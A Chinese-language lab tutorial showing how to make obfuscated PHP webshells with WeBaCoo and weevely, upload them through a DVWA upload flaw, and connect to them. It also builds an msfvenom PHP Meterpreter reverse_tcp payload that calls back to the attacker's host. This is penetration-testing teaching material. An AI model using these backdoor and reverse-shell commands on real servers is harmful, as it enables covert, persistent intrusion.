Kali 2.0 Web後門工具----WebaCoo、weevely、PHP Meterpreter
注:以下內容僅供學習使用,其他行為均與作者無關!轉載請註明出處:https://blog.csdn.net/qq_36711453/article/details/83933740 謝謝!
本文將介紹 Kali 2.0 版本下的三款Web後門工具:WebaCoo、weevely、PHP Meterpreter,這類工具通常用於維護控制權。
實驗環境:
● KALI 的IP地址是192.168.44.138;
● Metasploit的IP地址是192.168.44.130 ;
一、 WeBaCoo
WeBaCoo(Web Backdoor Cookie)是一款隱蔽的指令碼類Web後門工具。藉助HTTP協議,它可在客戶端和Web伺服器之間實現執行程式碼的網頁終端。WeBaCoo的精妙之處在於,Web伺服器和客戶端之間的通訊載體是Cookie。這就意味著多數的防毒軟體、網路入侵檢測/防禦系統、網路防火牆和應用程式防火牆都無法檢測到後門的存在。
1、WeBaCoo有兩種操作模式。
● Generation(生產線模式):指定-g 選項可進入這種模式。使用者可在這種模式下製作PHP 程式碼的payload。
● Terminal(終端模式):指定-t選項可進入這種模式。使用者可在這種模式下連線到被測主機的後門程式。
2、在WeBaCoo 的HTTP Cookie 中,以下三個引數的作用最為重要。
● cm:以Base64 編碼的shell指令。
● cn:載入著編碼後輸出內容的Cookie名稱。
● cp:封裝編碼後輸出內容的分隔符。
3、啟動WeBaCoo程式,在終端中執行以下命令:
#webacoo -h
與生成模式有關的命令列選項如下。
4、例項:
(1)用預設的設定,生成名為test.php的PHP後門程式,並使用WeBaCoo的程式碼混淆技術對後門進行處理,命令如下:
[email protected]:~# webacoo -g -o test.php
(2)檢視檔案test.php的內容如圖所示:
(3)接下來,把這個後門檔案上傳到被測主機(192.168.44.130)。我這裡通過dvwa檔案上傳做測試:
(4)上傳後訪問執行:
(5)接下來就可以使用以下指令連線到被測主機的後門程式。
(6)防火牆和代理伺服器只能夠發現客戶端在傳送如下請求:
服務端的響應資訊如下:
上述HTTP request和 response表明,WeBaCoo後門的客戶端和伺服器端的通訊是不易發現的加密會話。它所用的混淆技術降低了它被發覺的可能性。
二、 weevely
weevely 是一款具有高隱蔽性的針對PHP 平臺的Web shell。它實現了SSH 風格的終端介面,並有大量自動化的模組。測試人員可用它執行系統指令、遠端管理和滲透後期的自動滲透。下面是weevely的主要功能:
(1)它有30多種可完成自動管理滲透後期任務的功能模組。這些模組能夠:
執行命令和瀏覽遠端檔案系統;
檢測常見的伺服器配置問題;
創造TCP shell和reverse shell;
在被測主機上安裝HTTP代理;
利用目標主機進行埠掃描。
(2)使用HTTP Cookie作為後門通訊的載體;
(3)支援密碼認證;
1、啟動weevely程式,可在終端中使用以下命令;。
[email protected]:~# weevely
weeavely的主要用途是:
● 生成混淆PHP backdoor;
● 在影象檔案中追加多型的後門程式,並可通過.htaccess 檔案賦予影象檔案執行許可權;
● 生成後門.htaccess 檔案。
● 可通過help選項列出程式的全部模組和生成工具。
2、例項:
(1)生成混淆PHP backdoor,並將後門儲存為test1.php,命令如下:
[email protected]:~# weevely generate password test1.php
(2)上述指令生成的test1.php的內容如圖所示。
(3)然後通過正常的途徑或利用程式的漏洞,把後門檔案上傳到目標伺服器上。
(4)訪問成功上傳的Webshell;
(5)連線Webshell,命令如下:
[email protected]:~# weevely http://192.168.44.130/dvwa/hackable/uploads/test1.php password
只要連線成功,您就能連線到weevely的Web shell上。然後執行命令,檢視目標主機的資訊;
(6)上述資訊表明,我們成功地連線到被測主機的Webshell。通過:help指令檢視weevely支援的各種指令:
(7)使用net_scan模組掃描被測主機的22,80,8080埠;
[email protected]:/var/www/dvwa/hackable/uploads $ :net_scan 192.168.44.130 22,80,8080
掃描結果如下:
您可隨時使用組合鍵Ctrl+D 退出weevely shell。
三、PHP Meterpreter
Metasploit 有一個名為PHP Meterpreter的payload。這個模組可以建立具有Meterpreter功能的PHP Web shell。利用目標的漏洞(諸如常見的注入和上傳漏洞)之後,再把它的shell傳到目標主機即可。
1、例項
(1)製作PHP meterpreter,命令如下:
[email protected]:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.44.138 -f raw> php-meter.php
上述指令各選項的作用如下。
● -p:指定payload 為php/meterpreter/reverse_tcp。
● -f:設定輸出格式(raw)。
Metasploit 會把生成的PHP meterpreter儲存為檔案php-mter.php。
(2)在上傳後門到被測主機之前,首先要刪除指令碼第一行的註釋。註釋後文件內容如下:
(3)在Kali的主機上啟動Metasploit Console(msfconsole),並啟動multi/handler exploit。指定製作shell後門時用的 php/meterpreter/reverse_tcp payload。設定LHOST為Kali主機的IP 地址。使用exploit指令執行exploit的受理程式(handler);
(4)在利用注入或者遠端檔案包含漏洞等Web漏洞之後,把Web shell上傳到目標伺服器;
(5)訪問上傳的webshell :
(6) 之後,在執行Kali的測試主機上,Metasploit程式將會顯示Meterpreter會話;
此時,您就可以使用sysinfo和getuid之類的命令了。